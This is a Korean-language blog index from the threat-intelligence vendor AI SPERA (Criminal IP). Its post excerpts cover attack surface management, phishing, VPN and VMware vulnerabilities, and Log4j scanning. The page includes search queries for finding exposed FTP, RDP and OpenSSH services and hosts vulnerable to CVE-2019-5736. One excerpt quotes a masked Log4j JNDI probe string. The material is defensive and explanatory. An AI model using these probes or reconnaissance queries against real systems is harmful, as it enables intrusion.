비즈니스 고객 제보
불편을 느끼셨나요?
지금 바로 알려주세요.
AI SPERA가 발행하는 공식 콘텐츠를 한곳에 모았습니다. 제품 업데이트부터 리포트와 사례까지 확인할 수 있습니다.
2022년 3월 10일
디지털 혁신의 가속화와 수많은 기업들이 클라우드로 비즈니스를 확장하면서 관리되지 않은 다양한 외부 공격 표면(VPN, RDP, SMB, 인증서, 모바일 디바이스 등)으로 인해 공격자의 침입이 빈번하게 발생하고 있습니다. 외부 공격 표면을 성공적으로 보호하기 위해서는 정확한 IT 자산을 식별해야 하고 보안정책에 위반되는 서비스, 오픈 포트 등이 존재하지 않는지 실시간 모니터링이 되어야 합니다. 대부분의 기업들이 공격자의 침입을 경험하는 것은 미식별된 IT자산과 보안정책 위반에 의한 것입니다.…

2022년 3월 7일
5.검색쿼리 예시 5 IP 211.50.51.1 ~ 255 대역 검색 ip:211.50.51.1/24 IP 211.50.51.1 ~ 255 대역 검색 " data-large-file="https://i0.wp.com/blog.criminalip.io/wp-content/uploads/2022/03/5.png?fit=600%2C428&ssl=1" class="size-full wp-image-3150"…

2022년 3월 7일
4.검색 쿼리 예시 4 FTP 인증 성공 IP 검색 230 Login Port:21 FTP 인증 성공 IP 검색 " data-large-file="https://i0.wp.com/blog.criminalip.io/wp-content/uploads/2022/03/4-2.png?fit=614%2C504&ssl=1" class="size-full wp-image-3139"…

2022년 3월 7일
3.검색 쿼리 예시 3 Jacki 계정을 사용하는 RDP 서비스 검색 Jacki image:rdp Jacki 계정을 사용하는 RDP 서비스 검색 " data-image-caption="" data-large-file="https://i0.wp.com/blog.criminalip.io/wp-content/uploads/2022/03/3-3.png?fit=598%2C292&ssl=1" class="wp-image-3130 size-full"…

2022년 3월 7일
2.검색 쿼리 예시 2 Pfizer Inc. 조직에서 사용하는 openssh 서비스 검색 as_name: Pfizer Inc. product: “openssh” Pfizer Inc. 조직에서 사용하는 openssh 서비스 검색 " data-large-file="https://i0.wp.com/blog.criminalip.io/wp-content/uploads/2022/03/2-4.png?fit=600%2C520&ssl=1" class="size-full wp-image-3097"…

2022년 3월 7일
1.검색 쿼리 예시 1 Docker runC 버그, 권한 상승 취약점 찾기(CVE-2019-5736) cve_id: CVE-2019-5736 product: “docker” Docker runC 버그, 권한 상승 취약점 찾기(CVE-2019-5736) " data-large-file="https://i0.wp.com/blog.criminalip.io/wp-content/uploads/2022/03/1-2.png?fit=603%2C413&ssl=1" class="size-full…

2022년 3월 3일
과거부터 공격자는 유명 사이트와 유사한 피싱 사이트를 만들어 이메일, SMS, 게시판 등의 수단으로 개인정보, 금융 정보를 탈취하는 악의적인 수법을 사용해왔습니다.버라이즌(Verizon)의 '21 데이터 침해 조사 보고서에 따르면 침해의 36%가 피싱과 관련되어 있다고 발표했는데, 이는 피싱 수법이 침해 사고에 얼마나 많은 비중을 차지하고 있는지 알 수 있는 지표입니다. 누구라도 흔히 경험할 수 있는 피싱 시도의 일반적인 예시는 아래와 같습니다. 유명하거나 평판이 좋은 회사와 유사한 발신지 사용…

2022년 2월 25일
코로나19로 재택근무가 많아지면서 VPN을 이용하는 기업이 늘어났고 이로 인해 VPN 취약점을 이용한 공격이 증가하고 있는 상황입니다. 대표적인 사례로 국내는 한국원자력연구원과 한국항공우주산업 사례를 들 수 있는데, 이곳 모두 공격자가 VPN 취약점을 이용한 비인가자의 관리자 페이지 접근, 관리자 권한 없이 패스워드 변경 등을 한 것으로 확인되었습니다.해외 사례의 경우 중국 해커로 추정되는 해커가 VPN 취약점을 이용하여 미국 방위 산업 일부 시스템을 침입했으며, 러시아 해킹 그룹은 VPN…

2022년 2월 11일
Log4j 취약점이 전 세계를 강타했다. 해커들은 서버를 장악하기 위해 Log4j의 취약점이 감염된 서버를 찾아 전 세계의 모든 서버들을 매일같이 스캔하고 있다. 해커들이 log4j 취약점을 보유한 서버를 찾기 위해 어떤 스캐닝 기술을 사용하는지 살펴보았다. 공격자들은 가장 일차원적인 방법으로 “${jndi:ldap://***.*.**.***:53/c}” 패킷을 전송해 보고 서버의 반응을 살펴본다. 하지만 이 패턴은 언론 등에 너무나도 많이 공개가 되어 왔고, IDS/IPS에서 빠르게 탐지되어…

2022년 1월 26일
작년 2월, 컴퓨터 가상화 소프트웨어를 제공하는 VMware 사의 플랫폼 vSphere에서 중요 원격 코드 실행 (Remote Code Execution, RCE) 취약점이 발표되었다. VMSA-2021-0002 (CVE-2021-21972, CVE-2021-21973, CVE-2021-21974) . 이 취약점으로 인해 vSphere 를 사용하는 기업은 계정 없이도 서버에 침투할 수 있는 문제에 직면하게 되었고, 현재는 보안 패치가 나온 지 거의 1년이 지난 시점으로, 지금 이 취약점이 얼마나…

2022년 1월 12일
에이아이스페라 위협 인텔리전스 플랫폼 ‘Criminal IP’ AI Spera가 사이버 위협 인텔리전스 플랫폼인 ‘Criminal IP’(크리미널아이피)를 통해 수집된 Log4j(Log4Shell) 취약점(CVE-2021-44228)을 이용한 공격 로그 약 8천900건을 탐지, 분석한 데이터를 공개했습니다. 국내외 보안 업계가 아직 Log4j 취약점에 대한 완벽한 대응을 갖추지 못한 지금, 공식적인 패치 외에 기업 및 기관, 국가의 자체적인 보안 대응에 에이아이스페라의 Log4j 공격 시도…

비즈니스 고객 제보
불편을 느끼셨나요?
지금 바로 알려주세요.
AI SPERA와 함께하기
AI SPERA 여정에
지금 바로 합류하세요.